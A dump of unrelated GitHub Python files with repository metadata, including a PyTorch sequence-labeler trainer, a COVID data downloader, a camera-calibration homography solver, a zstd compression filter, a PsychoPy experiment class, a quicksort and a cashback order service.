# (batch_size, seq_length, word_emb_size * 2)\n concatenated = torch.cat(\n [embedded_words, encoded_chars], dim=-1)\n # (batch_size, seq_length, word_emb_size)\n z = self.attention(concatenated)\n # (batch_size, seq_length, word_emb_size)\n inputs = embedded_words*z + encoded_chars*(1.-z)\n else:\n # (batch_size, seq_length, word_emb_size)\n inputs = embedded_words\n\n # (batch_size, seq_length, hidden_size * 2)\n if self.dropout:\n encoded, _ = self.encoder(self.dropout_layer(inputs))\n else:\n encoded, _ = self.encoder(inputs)\n\n if self.uses_lm_loss:\n # Add language modeling loss; the loss is summed over batch\n loss += self.lm_loss_scale * self._compute_lm_loss(encoded, words)\n\n if self.uses_pre_output_layer:\n # (batch_size, seq_length, pre_output_layer_size)\n encoded = self.pre_output_layer(encoded)\n # (batch_size, seq_length, num_tags)\n outputs = self.output_layer(encoded)\n # Remove start and end token\n # (batch_size, seq_length - 2, num_tags)\n outputs = outputs[:, 1:-1, :]\n\n return outputs, loss\n\n def forward(self,\n words: Variable,\n chars: Variable,\n tags: Optional[Variable] = None,\n mask: Optional[Variable] = None,\n ) -> Variable:\n \"\"\"Compute the loss of the given batch of sentences and tags.\n\n Arguments\n ---------\n words : :class:`~torch.autograd.Variable`\n Word indices tensor of type ``LongTensor`` and size ``(batch_size, seq_length)``.\n This tensor should include the start and end token indices.\n chars : :class:`~torch.autograd.Variable`\n Character indices tensor of type ``LongTensor`` and size ``(batch_size, seq_length,\n char_seq_length)``. This tensor should include the character indices of the start\n and end token.\n tags : :class:`~torch.autograd.Variable`\n Tag indices tensor of type ``LongTensor`` and size ``(batch_size, seq_length - 2)``.\n This tensor should *not* include the tag for the start and end token.\n mask : :class:`~torch.autograd.Variable`, optional\n Mask tensor of type ``ByteTensor`` and size ``(batch_size, seq_length,\n char_seq_length)`` indicating the valid entries in ``chars``.\n\n Returns\n -------\n :class:`~torch.autograd.Variable`\n A variable of type ``FloatTensor`` and size ``(1,)`` containing the loss, summed\n over batch.\n \"\"\"\n\n self._check_inputs_dimensions_and_sizes(\n words, chars, tags=tags, mask=mask)\n if mask is None:\n mask = Variable(self._new(chars.size()).fill_(1)).byte()\n\n outputs, loss = self._compute_emissions_and_loss(words, chars, mask)\n\n # Transpose batch_size and seq_length for CRF\n # NOTE transposing tensors make them not contiguous, but CRF needs them so\n # (seq_length - 2, batch_size, num_tags)\n outputs = outputs.transpose(0, 1).contiguous()\n tags = tags.transpose(0, 1).contiguous()\n\n if tags is not None:\n # Return loss minus CRF log likelihood\n loss = loss - self.crf(outputs, tags)\n return loss\n\n\nclass TrainerMod(Trainer):\n \"\"\"Trainer for sequence labeler model.\n\n This class serves as a trainer for the sequence labeler model. At the heart of this class\n is its entrypoint, the ``run`` method, which implements a `template method pattern`_. The\n method executes several steps during training where individual step is implemented as\n a method. Thus, customizing the training algorithm can be done by simply inheriting from\n this class and overriding the desired methods.\n\n Arguments\n ---------\n train_corpus : str\n Path to the training corpus in two-column CoNLL format.\n save_to : str\n Path to a directory to save training artifacts.\n dev_corpus : str, optional\n Path to the development corpus in two-column CoNLL format.\n encoding : str\n File encoding to use. (default: utf-8)\n min_freq : int\n Minimum frequency of a word to be included in the vocabulary. (default: 2)\n word_embedding_size : int\n Size of word embeddings. (default: 300)\n dropout : float\n The dropout rate. (default: 0.5)\n encoder_hidden_size : int\n Size of the LSTM encoder hidden layer. (default: 200)\n lm_loss_scale : float\n Scaling coefficient for the language modeling loss. If set to a nonpositive scalar,\n language modeling loss is not computed. (default: 0.1)\n lm_layer_size : int\n Hidden layer size for language modeling. (default: 50)\n lm_max_vocab_size : int\n Maximum vocabulary size for language modeling. (default: 7500)\n pre_output_layer_size : int\n Size of pre-output layer. If set to a nonpositive number, no pre-output layer is\n used. (default: 50)\n char_integration_method : str\n How to integrate character embeddings. Possible values are 'none', 'concatenation',\n and 'attention'. If ``num_chars`` is 0 then this must be 'none', and vice versa.\n (default: 'none')\n char_embedding_size : int\n Size of character embeddings. (default: 50)\n char_encoder_hidden_size : int\n Size of the LSTM character encoder hidden layer. (default: 200)\n learning_rate : float\n The learning rate. (default: 0.001)\n optimizer : str\n Name of optimizer to use. Can be 'adam' or 'sgd'. (default: adam)\n num_epochs : int\n Number of epochs to train. (default: 10)\n batch_size : int\n Number of samples in one batch. (default: 16)\n device : int\n GPU device to use. Set to -1 for CPU. (default: -1)\n log_interval : int\n Print log every this number of updates. (default: 10)\n seed : int\n Random seed. (default: 201)\n logger : `~logging.Logger`, optional\n Logger object to use for logging.\n\n .. _template method pattern: https://en.wikipedia.org/wiki/Template_method_pattern\n \"\"\"\n def __init__(self, _run : Run,\n train_corpus: str,\n save_to: str,\n dev_corpus: str,\n num_epochs: int,\n char_integration_method: str,\n word_embedding_size: int = 300,\n lm_loss_scale: float = 0.1,\n dropout: float = 0.,\n pretrained_embeddings: str = None,\n update_pretrained_embedding: bool = True,\n learning_rate: float = 0.001,\n decay: bool = False,\n device: int = -1,\n decay_patience: int = 10,\n stop_patience: int = 3,\n early_stopping: bool = True,\n save: bool = False,\n model_class = SequenceLabeler) -> None:\n torch.backends.cudnn.enabled = False\n\n self.sacred_run = _run # instance of the experiment's sacred run object\n self.stop_patience = stop_patience\n self.decay_patience =decay_patience\n self.decay = decay\n self.best_loss = 1e15\n self.early_stopping = early_stopping\n self.dev_corpus = dev_corpus\n self.save = save\n self.pretrained_embeddings = pretrained_embeddings\n self.update_pretrained_embedding = update_pretrained_embedding\n self.model_class = model_class\n super(TrainerMod, self).__init__(train_corpus,\n save_to,\n self.dev_corpus,\n word_embedding_size=word_embedding_size,\n num_epochs=num_epochs,\n dropout=dropout,\n lm_loss_scale=lm_loss_scale,\n char_integration_method=char_integration_method,\n learning_rate=learning_rate,\n device=device)\n\n def on_start(self, state: dict) -> None:\n if state['train']:\n self.logger.info('Start training')\n self.train_timer.reset()\n # decaying learning rate\n if(self.decay):\n self.scheduler = ReduceLROnPlateau(\n self.optimizer, \n patience=self.decay_patience, \n factor=0.5)\n else:\n self.reset_meters()\n self.model.eval()\n\n def on_end_epoch(self, state: dict) -> None:\n elapsed_time = self.epoch_timer.value()\n assert len(self.references) == len(self.train_dataset)\n overall, by_type = self.get_conll_evaluation()\n self.logger.info(\n 'Epoch %d done (%.4fs): %.4f samples/s | loss %.4f | F1 %.4f',\n state['epoch'], elapsed_time, self.speed_meter.value()[0],\n self.loss_meter.value()[0], overall.f1_score)\n\n self.sacred_run.log_scalar(\n 'train_loss', self.loss_meter.value()[0], state['epoch'])\n self.sacred_run.log_scalar(\n 'train_f1', overall.f1_score, state['epoch'])\n\n if(self.decay):\n self.scheduler.step(self.loss_meter.value()[0]) # lr decay scheduler\n\n self.logger.info(self.format_per_tag_f1_score(by_type))\n self.save_model()\n\n if self.dev_iterator is not None:\n self.logger.info('Evaluating on dev set')\n self.engine.test(self.network, self.dev_iterator)\n assert len(self.references) == len(self.dev_iterator.dataset)\n overall, by_type = self.get_conll_evaluation()\n self.logger.info(\n 'Result on dev set: %.4f samples/s | loss %.4f | F1 %.4f',\n self.speed_meter.value()[0], self.loss_meter.value()[0],\n overall.f1_score)\n self.sacred_run.log_scalar(\n 'dev_loss', self.loss_meter.value()[0], state['epoch'])\n self.sacred_run.log_scalar(\n 'dev_f1', overall.f1_score, state['epoch'])\n self.current_loss = self.loss_meter.value()[0]\n if(self.early_stopping):\n if self.current_loss < self.best_loss:\n self.best_loss = self.current_loss\n self.wait = 0\n else:\n self.wait += 1\n if self.wait >= self.stop_patience:\n self.logger.info(\n f\"Early stop triggered after {state['epoch']} epoch(s)\")\n # terminating condition for train-loop in tnt\n state['maxepoch'] = state['epoch']\n for i, key in enumerate(sorted(by_type.keys())):\n score = by_type[key].f1_score\n score = f'{score:.4f}'\n self.sacred_run.log_scalar(key + \"_f1\", score, state['epoch'])\n\n self.logger.info(self.format_per_tag_f1_score(by_type))\n\n def save_artifacts(self) -> None:\n if self.save:\n super().save_artifacts()\n else:\n pass\n\n def build_model(self) -> None:\n model_args = (self.num_words, self.num_tags)\n print(model_args)\n num_chars = 0 if self.char_integration_method == 'none' else self.num_chars\n model_kwargs = dict(\n num_chars=num_chars,\n word_embedding_size=self.word_embedding_size,\n dropout=self.dropout,\n encoder_hidden_size=self.encoder_hidden_size,\n lm_loss_scale=self.lm_loss_scale,\n lm_layer_size=self.lm_layer_size,\n lm_max_vocab_size=self.lm_max_vocab_size,\n pre_output_layer_size=self.pre_output_layer_size,\n char_integration_method=self.char_integration_method,\n char_embedding_size=self.char_embedding_size,\n char_encoder_hidden_size=self.char_encoder_hidden_size,\n unk_id=self.WORDS.vocab.stoi[self.WORDS.unk_token]\n )\n\n if self.model_class == NewSequenceLabeler:\n use_pretrained_embeddings = True if self.pretrained_embeddings else False\n model_kwargs['use_pretrained_embeddings'] = use_pretrained_embeddings\n model_kwargs['update_pretrained_embedding'] = self.update_pretrained_embedding\n model_kwargs['pretrained_emb_dir'] = self.save_to\n\n self.model = self.model_class(*model_args, **model_kwargs)\n if self.device >= 0:\n self.model.cuda(self.device)\n self.logger.info('Saving model metadata to %s',\n self.model_metadata_path)\n with open(self.model_metadata_path, 'w') as f:\n json.dump({'args': model_args, 'kwargs': model_kwargs},\n f, indent=2, sort_keys=True)\n self.save_model()\n\n # modified for pretrained embedding\n def build_vocabularies(self) -> None:\n self.logger.info('Building vocabularies')\n if self.pretrained_embeddings is not None:\n vectors = Vectors(self.pretrained_embeddings)\n self.WORDS.build_vocab(\n self.train_dataset, min_freq=self.min_freq, vectors=vectors)\n vecfile = os.path.join(self.save_to, 'pretrained_embed_weights.pt')\n torch.save(self.WORDS.vocab.vectors, vecfile)\n else:\n self.WORDS.build_vocab(self.train_dataset, min_freq=self.min_freq)\n self.CHARS.build_vocab(self.train_dataset)\n self.TAGS.build_vocab(self.train_dataset)\n\n self.num_words = len(self.WORDS.vocab)\n self.num_chars = len(self.CHARS.vocab)\n self.num_tags = len(self.TAGS.vocab)\n self.logger.info(\n 'Found %d words, %d chars, and %d tags',\n self.num_words, self.num_chars, self.num_tags)\n\n self.logger.info('Saving fields to %s', self.fields_path)\n torch.save(self.fields, self.fields_path, pickle_module=dill)\n\n def run(self) -> None:\n self.set_random_seed()\n self.prepare_for_serialization()\n self.init_fields()\n self.process_corpora()\n self.build_vocabularies()\n self.build_model()\n self.build_optimizer()\n\n self.engine.hooks['on_start'] = self.on_start\n self.engine.hooks['on_start_epoch'] = self.on_start_epoch\n self.engine.hooks['on_sample'] = self.on_sample\n self.engine.hooks['on_forward'] = self.on_forward\n self.engine.hooks['on_end_epoch'] = self.on_end_epoch\n self.engine.hooks['on_end'] = self.on_end\n\n try:\n self.engine.train(\n self.network, self.train_iterator, self.num_epochs, self.optimizer)\n except KeyboardInterrupt:\n self.logger.info('Training interrupted, aborting')\n self.save_artifacts()\n\nclass EvaluatorMod(Evaluator):\n def __init__(self, _run, model, artifacts_path: str, corpus_path: str, device=-1\n ) -> None:\n self.sacred_run = _run # instance of the experiment's sacred run object\n self.artifacts_path = artifacts_path\n self.corpus_path = corpus_path\n self.model = model\n super().__init__(artifacts_path, corpus_path, device=device)\n\n def report_evaluation(self) -> None:\n self.logger.info('Evaluating hypotheses against references')\n evaluable = [zip(*sent_pair)\n for sent_pair in zip(self.references, self.hypotheses)]\n overall, by_type = evaluate_conll(evaluable)\n self.sacred_run.info['overall_precision'] = overall.precision\n self.sacred_run.info['overall_recall'] = overall.recall\n self.sacred_run.info['overall_f1'] = overall.f1_score\n # for key in sorted(by_type.keys()):\n # score = by_type[key].f1_score\n # self.sacred_run.info[key] = score\n for _, key in enumerate(sorted(by_type.keys())):\n for metric_key in by_type[key]._fields:\n metric_val = getattr(by_type[key], metric_key)\n self.sacred_run.info[f'{key}-{metric_key}'] = metric_val\n self.sacred_run.log_scalar(f'{key}-{metric_key}', metric_val)\n\n def load_artifacts(self, model) -> None:\n if self.artifacts_loaded:\n return\n\n self.logger.info('Loading artifacts from %s', self.artifacts_path)\n artifact_names = [\n TrainerMod.FIELDS_FILENAME,\n TrainerMod.MODEL_METADATA_FILENAME,\n TrainerMod.MODEL_PARAMS_FILENAME,\n ]\n with tempfile.TemporaryDirectory() as tmpdirname:\n self.logger.info('Extracting artifacts to %s', tmpdirname)\n with tarfile.open(self.artifacts_path, 'r:gz') as f:\n members = [member for member in f.getmembers()\n if member.name in artifact_names]\n f.extractall(tmpdirname, members=members)\n\n self.logger.info('Loading fields')\n self.fields = torch.load(\n os.path.join(tmpdirname, TrainerMod.FIELDS_FILENAME), pickle_module=dill)\n fields_dict = dict(self.fields)\n self.WORDS = fields_dict[TrainerMod.WORDS_FIELD_NAME]\n self.CHARS = fields_dict[TrainerMod.CHARS_FIELD_NAME]\n self.TAGS = fields_dict[TrainerMod.TAGS_FIELD_NAME]\n\n self.logger.info('Loading model metadata')\n with open(os.path.join(tmpdirname, TrainerMod.MODEL_METADATA_FILENAME)) as fm:\n self.model_metadata = json.load(fm)\n\n self.logger.info('Building model and restoring model parameters')\n self.model = model(\n *self.model_metadata['args'], **self.model_metadata['kwargs'])\n # Load to CPU, \n # see https://discuss.pytorch.org/t/on-a-cpu-device-how-to-load-checkpoint-saved-on-gpu-device/349/4 \n # noqa\n self.model.load_state_dict(\n torch.load(os.path.join(tmpdirname, TrainerMod.MODEL_PARAMS_FILENAME),\n map_location=lambda storage, loc: storage))\n if self.device >= 0:\n self.model.cuda(self.device)\n self.artifacts_loaded = True\n\n def run(self) -> None:\n self.load_artifacts(self.model)\n self.load_corpus()\n self.compute_references_and_hypotheses()\n self.report_evaluation()\n","repo_name":"kata-ai/wikiner","sub_path":"ingredients/seqlab_mod.py","file_name":"seqlab_mod.py","file_ext":"py","file_size_in_byte":28850,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1522339573","text":"import requests\nfrom pathlib import Path\nfrom util import retrieveFileLinkWls\n\nfileLinks = {\n \"eng\": \"https://coronavirus.data.gov.uk/downloads/csv/coronavirus-cases_latest.csv\",\n \"wls\": retrieveFileLinkWls(),\n # 'sct': 'https://raw.githubusercontent.com/tomwhite/covid-19-uk-data/master/data/covid-19-cases-uk.csv',\n \"sct\": \"https://www.gov.scot/binaries/content/documents/govscot/publications/statistics/2020/04/coronavirus-covid-19-trends-in-daily-data/documents/covid-19-data-by-nhs-board/covid-19-data-by-nhs-board/govscot%3Adocument/COVID-19%2Bdata%2Bby%2BNHS%2BBoard%2B110520.xlsx\",\n \"nir\": \"https://api.coronavirus-staging.data.gov.uk/v1/data?filters=areaType=nation;areaName=Northern%2520Ireland&structure=%7B%22areaType%22:%22areaType%22,%22areaName%22:%22areaName%22,%22areaCode%22:%22areaCode%22,%22date%22:%22date%22,%22newCasesByPublishDate%22:%22newCasesByPublishDate%22,%22cumCasesByPublishDate%22:%22cumCasesByPublishDate%22%7D&format=csv\",\n}\n\n\ndef downloadFile(fileLink, fileDir, filename):\n response = requests.get(fileLink, stream=True)\n fileExtension = fileLink.split(\".\")[-1]\n if fileExtension not in (\"csv\", \"xlsx\"):\n fileExtension = \"csv\"\n filePath = Path(fileDir, \".\".join([filename, fileExtension]))\n with open(filePath, \"wb\") as f:\n for chunk in response.iter_content(1024):\n f.write(chunk)\n\n\ndef retrieveData(country):\n country = country.lower()\n fileLink = fileLinks[country]\n fileDir = \"data/csv/src\"\n filename = \"data_latest_\" + country\n downloadFile(fileLink, fileDir, filename)\n","repo_name":"airallergy/covid-19-choropleth-map-uk","sub_path":"scripts/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15957751134","text":"'''Пробный файл с кодом для заполнения данных в созданной БД\nи вообще для всяких экспериментов с кодом. В проекте не участвует.'''\n#import app\nfrom app import app, db, Ingredients, Recipe\n'''Предположим, есть несколько строчек из БД. Превратим их в список со списками,\nчтобы затем передать в javascript на html странице'''\nwith app.app_context():\n id=1\n ingredients = Recipe.query.get(id).ingredients.all()\n print(len(ingredients))\n\n a=[[ingredients[i].ingredient, ingredients[i].weight, ingredients[i].calories, ingredients[i].proteins] for i in range(len(ingredients))]\n #print(a)\n sum=0\n for j in range(len(a)):\n sum += a[j][2]\n print(sum)\n'''\nwith app.app_context():\n\n \n # Create new line in the db\n r3=Recipy(title='Poridge', author='Serge',\n ingredients='rolled oats 100 g, \\n cherry juice 20 g,\\n raisins 20 g', \n instructions='Mix it and wait for 2 hours')\n db.session.add(r3)\n db.session.commit()\n \n # change an existed line in the db\n a=Recipy.query.get(4)\n a.instructions='Mix it and wait for 4 hours'\n db.session.commit()\n '''\n","repo_name":"SergeyGurbich/Cookbook","sub_path":"fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17089721966","text":"from django.test import LiveServerTestCase\nfrom selenium.webdriver.chrome.webdriver import WebDriver\n\n\nclass HomeTets(LiveServerTestCase):\n def test_selenium(self):\n selenium = WebDriver()\n try:\n for i in xrange(5):\n print('Requesting {}'.format(i))\n selenium.get('{}/{}'.format(self.live_server_url, i))\n finally:\n selenium.quit()\n","repo_name":"joshuablake/selenium","sub_path":"home/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21771233831","text":"import time\r\nfrom typing import Text\r\nimport numpy as np\r\nfrom StimulationProcess.BasicStimulationProcess import BasicStimulationProcess\r\nfrom psychopy import event, visual\r\n\r\n\r\nclass IdleProcess(BasicStimulationProcess):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n\r\n def change(self):\r\n\r\n self.controller.currentProcess = self.controller.prepareProcess\r\n\r\n def run(self):\r\n # 本节实验结束界面\r\n self._idleInterface()\r\n # 等待键盘输入继续\r\n # event.waitKeys(keyList=['space'])\r\n\r\n # 更新当前block的信息\r\n self.update()\r\n # self.eventController.clearEvent()\r\n\r\n time.sleep(3)\r\n\r\n\r\n def _idleInterface(self):\r\n \r\n self.w.flip()\r\n if self.controller.currentBlockINX == 0:\r\n text = '实验即将开始,请保持平静,按空格键继续'\r\n else:\r\n text = '第%s节实验已经结束\\n\\n\\n 休息结束结束后请按空格键继续实验' % self.controller.currentBlockINX\r\n text = visual.TextStim(self.w, pos=[0, 0], text=text, color=(255, 255, 255),\r\n colorSpace='rgb255')\r\n text.draw()\r\n\r\n self.w.flip()\r\n\r\n self.controller.endBlock = False\r\n\r\n pass\r\n\r\n def update(self):\r\n\r\n self.controller.epochThisBlock = 0\r\n \r\n currentBlockINX = self.controller.currentBlockINX\r\n self.controller.blockCues = self.cues[currentBlockINX]\r\n self.controller.blockCueText = self.cueText[currentBlockINX]\r\n self.controller.blockMask = self.masks[currentBlockINX]\r\n text = ' >>'+''.join(self.cueText[currentBlockINX])\r\n\r\n self.controller.dialogue = self.drawDialogue(text,color='gray',fillColor='white')\r\n self.controller.feedback = None\r\n\r\n self.initFrame.draw()\r\n self.controller.dialogue.draw()\r\n\r\n self.w.flip()\r\n self.controller.w = self.w\r\n self.controller.endBlock = False\r\n self.controller.feedback = self.drawDialogue(\"\",color='White',fillColor=None)\r\n return \r\n\r\n\r\n def _openEyes(self):\r\n self.w.flip()\r\n\r\n text = visual.TextStim(\r\n self.w, pos=[0, 0], text='请注释屏幕中央的标记,保持视线稳定',\r\n color=(255, 255, 255), colorSpace='rgb255'\r\n )\r\n text.draw()\r\n self.w.flip()\r\n\r\n time.sleep(1)\r\n \r\n \r\n cross = visual.ShapeStim(\r\n win=self.w, name='polygon', vertices='cross',\r\n size=(50, 50),\r\n ori=0.0, pos=(0, 0),\r\n lineWidth=1.0, colorSpace='rgb', lineColor='white', fillColor='white',\r\n opacity=None, depth=0.0, interpolate=True)\r\n\r\n cross.draw()\r\n self.w.flip()\r\n time.sleep(1)\r\n\r\n pass\r\n\r\n def _closeEyes(self):\r\n\r\n text = visual.TextStim(\r\n self.w, pos=[0, 0], text='请闭眼',\r\n color=(255, 255, 255), colorSpace='rgb255'\r\n )\r\n text.draw()\r\n\r\n self.w.flip()\r\n\r\n time.sleep(1)\r\n\r\n pass\r\n \r\n\r\n \r\n\r\n \r\n","repo_name":"ShinlDiego/40-PschoPy","sub_path":"StimulationProcess/IdleProcess.py","file_name":"IdleProcess.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12913956952","text":"from random import random\n\ndef quick_sort(array, left_index, right_index):\n print(array)\n if left_index < right_index:\n pivot_index = partition(array, left_index, right_index)\n quick_sort(array, left_index, pivot_index - 1)\n quick_sort(array, pivot_index + 1, right_index)\n\ndef partition(array, start_index, end_index):\n i = start_index - 1\n pivot_index = end_index\n pivot = array[pivot_index]\n for j in range(start_index, end_index):\n if array[j] <= pivot:\n i += 1\n swap_items(array, i, j)\n swap_items(array, pivot_index, i + 1)\n pivot_index = i + 1\n return pivot_index\n\ndef swap_items(array, index_a, index_b):\n temp = array[index_a]\n array[index_a] = array[index_b]\n array[index_b] = temp\n\na = [int(random() * 20) for _ in range(20)]\n# b = [1,3,5,2,6,3,7,4]\nquick_sort(b, 0, len(b) - 1)\nprint(b)\n","repo_name":"bibbycodes/data_structures","sub_path":"lib/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25160698497","text":"from typing import List\n\nfrom src.entities.orders.repository import OrderRepository\nfrom src.entities.orders.schemas import (\n CreateOrderSchema,\n OrderInDBSchema,\n OrderSchema,\n PublicOrderSchema,\n)\nfrom src.settings.environment import Environment\n\n\nclass OrderService:\n @classmethod\n def get_all_orders(cls):\n orders = OrderRepository.get_all_orders()\n\n orders_with_cashback_applied = cls.__append_cashback_values(orders)\n\n return orders_with_cashback_applied\n\n @classmethod\n def __append_cashback_values(cls, orders: List[OrderInDBSchema]):\n orders_with_cashback_applied = []\n\n for order in orders:\n order_with_cashback = order.dict()\n\n cashback_pct = cls.__calculate_cashback_pct(order)\n\n order_with_cashback[\"cashback_value\"] = order.value * cashback_pct\n order_with_cashback[\"cashback_pct\"] = f\"{int(cashback_pct * 100)}%\"\n\n orders_with_cashback_applied.append(\n PublicOrderSchema(**order_with_cashback)\n )\n\n return orders_with_cashback_applied\n\n @classmethod\n def __calculate_cashback_pct(cls, order: OrderInDBSchema):\n if order.value < 1000:\n return 0.1\n elif order.value < 1500:\n return 0.15\n\n return 0.2\n\n @classmethod\n def create_order(cls, order: CreateOrderSchema):\n order_to_save = OrderSchema(**order.dict())\n\n if cls.__is_auto_aproved(order):\n order_to_save.status = \"Aprovado\"\n\n return OrderRepository.create_new_order(order_to_save)\n\n @classmethod\n def __is_auto_aproved(cls, order):\n env = Environment()\n return order.cpf in env.AUTO_APPROVED_CPFS\n","repo_name":"vschmidt/template_fastapi","sub_path":"src/entities/orders/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37083087846","text":"import math\nimport numpy as np\nimport scipy.optimize as opt\n\nfrom typing import List\nfrom .utils import homogenous\nfrom .types import *\n\n__all__ = [\"findHomography\"]\n\n\ndef findHomography(objPts: List[Vector3d], imgPts: List[Vector2d]) -> Matrix3d:\n assert len(objPts) == len(imgPts) and len(objPts) >= 4\n objNormMat = _getNormalizationMatrix(objPts)\n imgNormMat = _getNormalizationMatrix(imgPts)\n\n n_pts = len(objPts)\n A: MatrixXd = np.zeros([2 * n_pts, 8])\n b: VectorXd = np.zeros([2 * n_pts, 1])\n for i in range(n_pts):\n objPt: Vector3d = homogenous(objPts[i][:2])\n imgPt: Vector3d = homogenous(imgPts[i])\n\n objPt = objNormMat @ objPt\n imgPt = imgNormMat @ imgPt\n\n A[2 * i, 0:3] = objPt.flatten()\n A[2 * i, 3:6] = np.zeros([3], dtype=np.float64)\n A[2 * i, 6:8] = -imgPt[0] * objPt[0:2].flatten()\n b[2 * i, 0] = imgPt[0]\n\n A[2 * i + 1, 0:3] = np.zeros([3], dtype=np.float64)\n A[2 * i + 1, 3:6] = objPt.flatten()\n A[2 * i + 1, 6:8] = -imgPt[1] * objPt[0:2].flatten()\n b[2 * i + 1, 0] = imgPt[1]\n\n H_vec: VectorXd\n if n_pts == 4:\n H_vec = np.linalg.inv(A) @ b\n else:\n U, D, Vt = np.linalg.svd(A, full_matrices=False)\n D_inv = np.zeros([8, 8], dtype=np.float64)\n for k in range(8):\n D_inv[k, k] = 0.0 if D[k] < 1e-6 else 1. / D[k]\n H_vec = Vt.T @ D_inv @ U.T @ b\n\n # the last element is always 1\n H: Matrix3d = homogenous(H_vec).reshape(3, 3)\n H = np.linalg.inv(imgNormMat) @ H @ objNormMat\n H /= H[2, 2]\n\n H = _optimizeHomography(H, objPts, imgPts)\n\n return H\n\n\ndef _getNormalizationMatrix(pts: List[Vector2d], var: float = 2.0) -> Matrix3d:\n # calculate mean\n miu_x = 0.0\n miu_y = 0.0\n for p in pts:\n miu_x += p[0]\n miu_y += p[1]\n miu_x /= len(pts)\n miu_y /= len(pts)\n\n # calculate std\n std_x = 0.0\n std_y = 0.0\n for p in pts:\n std_x += (p[0] - miu_x) * (p[0] - miu_x)\n std_y += (p[1] - miu_y) * (p[1] - miu_y)\n std_x = math.sqrt(std_x / len(pts))\n std_y = math.sqrt(std_y / len(pts))\n\n # Compose normalization matrix\n fx = math.sqrt(var) / std_x\n fy = math.sqrt(var) / std_y\n normMat = np.array(\n [[fx, 0, -fx * miu_x],\n [0, fy, -fy * miu_y],\n [0, 0, 1]])\n\n return normMat\n\n\ndef _optimizeHomography(H: Matrix3d,\n objPts: List[Vector3d],\n imgPts: List[Vector2d],\n verbose: bool = False) -> Matrix3d:\n \"\"\"\n Optimize H using Levenberg-Marquardt algorithm.\n \"\"\"\n # H has 8 DOF\n H_init: VectorXd = H.flatten()[:8]\n\n res: opt.OptimizeResult = opt.least_squares(\n _reprojection_error,\n H_init,\n _jacobian,\n method=\"lm\",\n verbose=verbose,\n args=(objPts, imgPts),\n )\n H_final: Matrix3d = homogenous(res.x).reshape(3, 3)\n\n return H_final\n\n\ndef _reprojection_error(H_vec: VectorXd,\n objPts: List[Vector3d],\n imgPts: List[Vector2d]) -> VectorXd:\n residuals: VectorXd = np.zeros([2 * len(objPts)], dtype=np.float64)\n\n H: Matrix3d = homogenous(H_vec).reshape(3, 3)\n for i in range(len(objPts)):\n objPt: Vector3d = homogenous(objPts[i][:2])\n predPt: Vector3d = H @ objPt\n predPt /= predPt[2]\n\n # add residuals:\n # Pi = [Xi, Yi, 1]\n # u = h1^T * Pi\n # v = h2^T * Pi\n # w = h3^T * Pi\n # xi' = u / w\n # yi' = v / w\n # Jx = xi - xi'\n # Jy = yi - yi'\n residuals[2 * i] = imgPts[i][0] - predPt[0]\n residuals[2 * i + 1] = imgPts[i][1] - predPt[1]\n\n return residuals\n\n\ndef _jacobian(H_vec: VectorXd,\n objPts: List[Vector3d],\n imgPts: List[Vector2d]) -> MatrixXd:\n jac: MatrixXd = np.zeros([2 * len(objPts), len(H_vec)], dtype=np.float64)\n\n H = homogenous(H_vec).reshape(3, 3)\n for i in range(len(objPts)):\n objPt: Vector3d = homogenous(objPts[i][:2])\n predPt: Vector3d = H @ objPt\n u: float = predPt[0]\n v: float = predPt[1]\n w: float = predPt[2]\n\n # ∂Jx/∂h\n jac[2 * i, 0:3] = -objPt.flatten() / w\n jac[2 * i, 3:6] = 0.0\n jac[2 * i, 6:8] = u / (w * w) * objPt[:2].flatten()\n\n # ∂Jy/∂h\n jac[2 * i + 1, 0:3] = 0.0\n jac[2 * i + 1, 3:6] = -objPt.flatten() / w\n jac[2 * i + 1, 6:8] = v / (w * w) * objPt[:2].flatten()\n\n return jac\n","repo_name":"cvamateur/CamCalib","sub_path":"python/camcalib/homography.py","file_name":"homography.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37961870386","text":"import zstandard as zstd\n\nfrom .constants import (COMPRESSION_ZSTD, COMPRESSION_NONE)\n\n\nclass ZstdDecompressionFilter:\n def __init__(self):\n self._compress_ctx = zstd.ZstdDecompressor()\n\n def __call__(self, ctx):\n if ctx.compression == COMPRESSION_ZSTD:\n ctx.payload = self._compress_ctx.decompress(ctx.payload)\n ctx.compression = COMPRESSION_NONE\n\n\nclass ZstdCompressionFilter:\n def __init__(self, min_compression_size, *, strategy=zstd.STRATEGY_FAST):\n self._min_compression_size = min_compression_size\n self._params = zstd.CompressionParameters(strategy=strategy)\n self._compress_ctx = zstd.ZstdCompressor(\n compression_params=self._params)\n\n def __call__(self, ctx):\n if ctx.compression != COMPRESSION_NONE and \\\n len(ctx.payload) >= self._min_compression_size:\n ctx.payload = self._compress_ctx.compress(ctx.payload)\n ctx.compression = COMPRESSION_ZSTD\n","repo_name":"smfrpc/smf-pyaio","sub_path":"aiosmf/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20386704278","text":"# Author: ComradeSlyK (gregorini.silvio@gmail.com)\n# Solutions for https://adventofcode.com/2020/day/14\n\nfrom itertools import product\n\nfrom AdventOfCode.common import load_input, timer\n\n\ndef binarystr_to_decimalstr(b):\n return str(sum(2 ** i * int(c) for i, c in 